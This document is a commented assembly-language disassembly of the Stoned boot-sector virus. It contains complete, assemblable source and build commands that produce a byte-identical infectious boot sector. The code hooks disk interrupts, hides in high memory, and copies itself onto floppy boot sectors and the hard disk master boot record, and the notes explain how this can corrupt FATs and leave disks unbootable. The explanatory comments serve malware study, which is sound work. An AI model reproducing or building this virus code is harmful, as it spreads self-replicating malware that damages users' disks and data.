PAGE  80,132

; BOOTdkid.ASM  Boot sector - don't know id -- virus code
;
; 7.14.91       Disassembly from floppy boot sector 512-byte image (lsz)
;               Assembles error-free (MASM 5.0)
;               Byte-identical to original floppy boot sector
;               Not tested

; ------------------- program notes -------------------------------------
comment ~

This is a disassembly of a virus diskette boot sector.

This virus will create a 2KB hidden area in high memory and
install itself there.  It will intercept all diskette a: drive
read/write requests and check to see if it has installed itself
on the diskette in drive a:.  If not, it will save the old boot
sector and substitute itself on the floppy.  It will also
install itself on a hard disk if there is one.  In this way it
will propagate itself from disk to disk.

It will periodically also emit the message "Your PC is stoned!"
from time to time.  But other than that, it is nominally a
benign virus (except to those who are trying to determine where
the messages are coming from).

The real problem is that it won't work correctly if a diskette
other than a 360KB floppy is used (likely), or if a 360KB floppy
uses more than 96 directory entries (unlikely).

It assumes the diskette is a 360KB DSDD diskette with a boot
sector, two FATs of two sectors each, and seven directory
sectors.  The last sector of the directory entries will hold the
copy of the old boot sector.  This will get overwritten if the
directory entries exceed 96 (out of 112).

When this virus installs itself on any other format of disk, it
will overlay other areas -- usually the second FAT.  Versions of
DOS around 3.2 or later changed the way it handled the disk
pointer.  As the disk pointer moves through the free cluster
chain, the entries into the high end of the FAT will eventually
overwrite the saved copy of the original boot code, and the disk
will no longer boot.


Program control is transferred to this code by the system BIOS
after it completes its POST routines.

To create a boot sector image from this .asm file, first go
through the usual exercise of creating an .exe file, where
ww.asm is this working source file:

       C:\>masm ww,,ww;
       C:\>link ww,ww;
       C:\>exe2bin ww.exe ww.bin

The boot sector code is loaded by the system BIOS at 0000:7c00.
This .asm file will generate a load image that has the proper
offsets and references at 7c00h.

When the ww.bin file created above is compared with an image
of the diskette boot sector, it will be byte-for-byte identical
except for the machine- and disk-format specific data bytes.

 R. Zider
 San Francisco

~tnemmoc

;======================================================================


; ----- Data segment ---------------------------------------------------------
;
;       This section is to establish addressability of locations.
;       No code gets generated by the assembler.
;
dseg1           segment at 0000
                org     13h*4
i13_off         dw     ?                        ; (0000:004C=52h)
i13_seg         dw     ?                        ; (0000:004E=0C860h)
                org     046ch
timer_low       db      ?                       ; (0000:046C=2098h)
dseg1           ends

dseg2           segment at 0040h
                org     13h
bios_memsize_kb dw      ?                       ; (0000:0413=2BFh)
                org     3fh
flpy_mot_stat   db      ?                       ; (0000:043F=10h)
dseg2           ends

fdisk_ptbl      equ     1BEh                    ; fixed disk partition table
fdisk_ptbl_buf  equ     3BEh                    ; same, but in read buffer

boot_loc        equ     7c00h                   ; BIOS boot load point
this_org        equ     0
code_len        =       offset (code_end - this_org)   ; (1B9h)
sec_len         =       offset (sec_end - this_org)    ; (200h)
buf_offset      =       offset (sec_len)               ; (200h)


; -------------- Code Segment --------------------------------------------
;
seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a


                org     this_org

dkid            proc    far

start:
;*              jmp     far ptr loc_1           ;*(07C0:0005)
                db      0EAh, 05h, 00h,0C0h, 07h

loc_1:
                jmp     loc_7                   ; (7CA1)

; -------------- data section
;
drive_byte      db      0                       ; 2 = hard drive
bios_i13_off    dw      2E12h                   ; overlaid
bios_i13_seg    dw      0F000h                  ; overlaid
hidmementry_off dw      offset hidmem_entry     ; (0E4h)
; hidmementry_off dw      offset hidmem_entry - boot_loc   ; (0E4h)
hiddenmem_seg   equ     this    word
hidmementry_seg dw      9F80h                   ; (0000:7C0F=676h) gets overlaid
reentry_off     dw      boot_loc                ; (7C00h)
reentry_seg     dw      0


; -------------- code section
;

;
;                  New Int 13h Disk trap
;

; This routine will trap int 13h calls to test if the new virus
; boot sector has been installed on the floppy diskette in drive a:.
;
; If it has already been installed, it simply chains to the old
; int 13h code.
;
; If not, it will copy the original boot sector
; to the last sector of the directory sectors and install its
; own code into the diskette boot sector.  It then chains to the
; old int 13h code.

trap_int13h:

        push    ds
        push    ax

; ----- trap only read/write disk calls (ah = 2 or 3)
;
        cmp     ah,2                    ;
        jb      chain_to_old_int13h     ; Jump if below
        cmp     ah,4
        jae     chain_to_old_int13h     ; Jump if above or =

; ----- trap only diskette a: (dl = 0)
;
        or      dl,dl
        jnz     chain_to_old_int13h     ; Jump if not zero

; ----- skip if motor is running
;
        xor     ax,ax                   ; Zero register
        mov     ds,ax
        mov     al,ds:flpy_mot_stat     ; (0000:043F=10h)
        test    al,1                    ; drive 0 motor on
        jnz     chain_to_old_int13h     ; Jump if not zero -- motor running

; ----- check if boot sector already installed
;       and install ours if not
;
        call    install_bootsec_maybe   ; (7C3A)


chain_to_old_int13h:

; ----- now chain to normal BIOS int 13h disk operation
;
        pop     ax
        pop     ds
        jmp     dword ptr cs:bios_i13_off           ; (xxxx:0009)

dkid            endp

;
;                              SUBROUTINE
;

install_bootsec_maybe           proc    near
        push    bx
        push    cx
        push    dx
        push    es
        push    si
        push    di
        mov     si,4                    ; retry 4 times

retry_disk_read:

; ----- read floppy a: boot sector into buffer at end of code at cs:0200
;
        mov     ax,201h                 ; read one sector
        push    cs
        pop     es                      ; set es:bx buffer address
        mov     bx,offset buf_offset    ; to buffer at cs:0200h
        xor     cx,cx                   ; Zero register
        mov     dx,cx                   ; head 0, drive 0 (a:)
        inc     cx                      ; cylinder 0, sector 1 (boot sector)
        pushf                           ; Push flags -- simulate int 13h
        call    dword ptr cs:bios_i13_off      ; (xxxx:0009)
        jnc     loc_4                   ; Jump if carry=0
        xor     ax,ax                   ; ah = 0: reset disk function
        pushf                           ; Push flags -- simulate int 13h
        call    dword ptr cs:bios_i13_off    ; (xxxx:0009=0)
        dec     si                      ; decrement try count
        jnz     retry_disk_read         ; Jump if not zero
        jmp     short loc_6             ; (7C9A)
        db      90h
loc_4:

; ----- compare first two words to see if we've already remapped the boot sector
;
        xor     si,si                   ; set zero offset source
        mov     di,offset buf_offset    ; (xxxx:0200=0) buffer destination
        cld                             ; Clear direction
        push    cs
        pop     ds
        lodsw                           ; String [si] to ax
        cmp     ax,[di]
        jne     loc_5                   ; Jump if not equal
        lodsw                           ; String [si] to ax
        cmp     ax,[di+2]
        je      loc_6                   ; Jump if equal -- already installed
loc_5:

; ----- not the same, so remap this boot sector to last directory sector...
;
        mov     ax,301h                 ; write one sector
        mov     bx,200h                 ; es:bx to read buffer (cs:0200)
        mov     cl,3                    ; sector 3
        mov     dh,1                    ; dh=1: head 1 --> last sector
                                        ;  in directory
        pushf                           ; simulate int 13h
        call    dword ptr cs:bios_i13_off    ; (xxxx:0009=0)
        jc      loc_6                   ; Jump if carry Set

; ----- ...and install our own boot sector
;       (write ourself to the diskette boot sector)
;
        mov     ax,301h                 ; write one sector
        xor     bx,bx                   ; es:bx to start of code (cs:0000)
        mov     cl,1                    ; write sector 1
        xor     dx,dx                   ; head 0, drive 0 (a:)
        pushf                           ; simulate int 13h
        call    dword ptr cs:bios_i13_off ; (xxxx:0009=0)
loc_6:
        pop     di
        pop     si
        pop     es
        pop     dx
        pop     cx
        pop     bx
        retn

install_bootsec_maybe           endp


; ----- beginning of main code section
;
loc_7:
        xor     ax,ax                   ; Zero register
        mov     ds,ax                   ; set DS to 0000


; ----- set up local stack from load point down
;
        cli                             ; Disable interrupts
        mov     ss,ax                   ; while setting new stack
        mov     sp,offset seg_a:boot_loc       ; to load point
        sti                             ; Enable interrupts

; ----- save old int 13h vector
;
        mov     ax,ds:i13_off           ; (0000:004C=52h)
        mov     bios_i13_off+boot_loc,ax         ; (0000:7C09=5B04h)
        mov     ax,ds:i13_seg           ; (0000:004E=0C860h)
        mov     bios_i13_seg+boot_loc,ax         ; (0000:7C0B=0C358h)

; ----- make a hidden 2KB area at the top of memory
;
        mov     ax,ds:bios_memsize_kb   ; (0000:0413=02BFh = 703KB)
        dec     ax                      ; reduce mem size by 2KB
        dec     ax
        mov     ds:bios_memsize_kb,ax   ; (0000:0413=>02BDh = 701KB)
        mov     cl,6                    ; *1024/16=*64 to get seg para
        shl     ax,cl                   ; Shift w/zeros fill
        mov     es,ax                   ; set ES to new hidden memory para
        mov     ds:hiddenmem_seg+boot_loc,ax     ; (0000:7C0F=>AF40h)

; ----- set up the int 13h vector to point to hidden memory int 13h trap code
;
        mov     ax,offset trap_int13h   ;(15h)
        mov     ds:i13_off,ax           ; (0000:004C=52h)
        mov     ds:i13_seg,es           ; (0000:004E=0C860h)

; ----- copy this program code to hidden memory
;       from ds:si 7c00:0000 to es:di xxxx:0000
;
        mov     cx,offset code_len      ; (1B8h)
        push    cs                      ; fix DS=CS
        pop     ds
        xor     si,si                   ; copy from the beginning
        mov     di,si
        cld                             ; Clear direction
        rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]

; ----- now jump to hidden high memory (continue with load process)
;
        jmp     dword ptr cs:hidmementry_off    ; (9000:000D=0)


; ----- entry point from jump from boot code (prior instruction)
;
hidmem_entry:

; ----- reset diskette drive
;       (the new int 13h trap code will pass this through)
;
        mov     ax,0
        int     13h                     ; Disk  dl=drive a  ah=func 00h
                                        ;  reset disk, al=return status

; ----- set up to read the saved original boot sector
;       load it at normal boot_loc 0000:7C00
;
        xor     ax,ax                   ; Zero register
        mov     es,ax
        mov     ax,201h                 ; disk read one sector
        mov     bx,boot_loc             ; ES:BX to 0000:7C00
        cmp     byte ptr cs:drive_byte,0       ; (xxxx:0008=0)
        je      loc_8                   ; Jump if 0 (boot drive is a:)

; ----- installed hard disk boot, so just read saved boot code from hard drive 0
;       (No message will be emitted, but int 13h trap will now install this
;       virus code on any new floppy disks.)
;
        mov     cx,7                    ; ch=0: cyl 0, cl=7: sector 7
        mov     dx,80h                  ; dh=0: head 0, dl=80: fdisk 0 (c:)
        int     13h                     ; Disk  dl=drive 0  ah=func 02h
                                        ;  read sectors to memory es:bx
        jmp     short loc_10            ; (7D4E)
        db      90h

loc_8:

; ----- booted from diskette so read from a: head 1, sector 3
;       where the original boot sector was saved
;
        mov     cx,3
        mov     dx,100h                 ; dh=1: head 1, dl=0: floppy disk a:
        int     13h                     ; Disk  dl=drive a  ah=func 02h
                                        ;  read sectors to memory es:bx
        jc      loc_10                  ; Jump if carry Set

; ----- emit msg only sometimes (1 out of 8 times on average)
;
        test    byte ptr es:timer_low,7 ; (0000:046C) mask 3 bits (2**3=8)
        jnz     loc_9                   ; Jump if not zero
        mov     si,offset stoned_msg    ; (xxxx:0189=0)
        push    cs
        pop     ds
tty_ASCIIZ:
        lodsb                           ; String [si] to al
        or      al,al                   ; Zero ?
        jz      loc_9                   ; Jump if zero
        mov     ah,0Eh
        mov     bh,0
        int     10h                     ; Video display   ah=functn 0Eh
                                        ;  write char al, teletype mode
        jmp     short tty_ASCIIZ        ; (7D1D)

loc_9:

; ----- check boot sector on hard drive 0 (if any)
;
        push    cs
        pop     es
        mov     ax,201h                 ; read one sector
        mov     bx,offset buf_offset    ; (xxxx:0200)
        mov     cl,1                    ; ch=0: cyl 0, cl=1: sector 1 (boot
                                        ;  sector)
        mov     dx,80h                  ; dh=0: head 0, dl=80: fdisk 0 (c:)
        int     13h                     ; Disk  dl=drive 0  ah=func 02h
                                        ;  read sectors to memory es:bx
        jc      loc_10                  ; Jump if carry Set

; ----- check first two words to see if virus boot has already been installed
;
        push    cs
        pop     ds
        mov     si,offset buf_offset    ; (xxxx:0200)
        mov     di,offset start            ; (xxxx:0000)
        lodsw                           ; String [si] to ax
        cmp     ax,[di]
        jne     loc_11                  ; Jump if not equal
        lodsw                           ; String [si] to ax
        cmp     ax,[di+2]
        jne     loc_11                  ; Jump if not equal
loc_10:

; ----- clear boot drive byte
;
        mov     byte ptr cs:drive_byte,0

; ----- now reenter original boot sector code
;
        jmp     dword ptr cs:reentry_off     ; (9000:0011=0)


loc_11:

; ----- not yet installed, so install on hard disk
;       first save old boot sector at C-H-N = 0-0-7
;
        mov     byte ptr cs:drive_byte,2       ; (xxxx:0008=0)
        mov     ax,301h                 ; write one sector
        mov     bx,offset buf_offset    ; (xxxx:0200=0)
        mov     cx,7                    ; ch=0: cyl 0, cl=7: sector 7
        mov     dx,80h                  ; dh=0: head 0, dl=80: fdisk 0 (c:)
        int     13h                     ; Disk  dl=drive 0  ah=func 03h
                                        ;  write sectors from mem es:bx
        jc      loc_10                  ; Jump if carry Set

; ----- move fixed disk partition table data down from the
;       end of the read buffer to the end of the new
;       virus boot sector image
;       (appears to be reading 200h excess bytes here)
;
        push    cs
        pop     ds                      ; DS=CS
        push    cs
        pop     es                      ; ES=CS
        mov     si,fdisk_ptbl_buf       ; (xxxx:03BE=0)
        mov     di,fdisk_ptbl           ; (xxxx:01BE=0)
        mov     cx,242h
        rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]

; ----- write sector to c: drive hard disk boot sector
;       (note that drive_byte will be 2)
;
        mov     ax,301h                 ; write one sector
        xor     bx,bx                   ; reset es:bx = xxxx:0000
        inc     cl                      ; ch=0: cyl 0, cl=1: sector 1 (boot
                                        ;  sector)
        int     13h                     ; Disk  dl=drive 0  ah=func 03h
                                        ;  write sectors from mem es:bx
        jmp     short loc_10            ; (7D4E)

; ----- messages
;
stoned_msg      db      7, 'Your PC is now Stoned!', 7, 0Dh
                db      0Ah, 0Ah, 0
legalise_msg    db      'LEGALISE MARIJUANA!'   ; never gets referenced

code_end        equ     $

                db      72 dup (0)              ; pad to 512-byte sector

sec_end         equ     $

seg_a           ends



        end     start

;  finis 

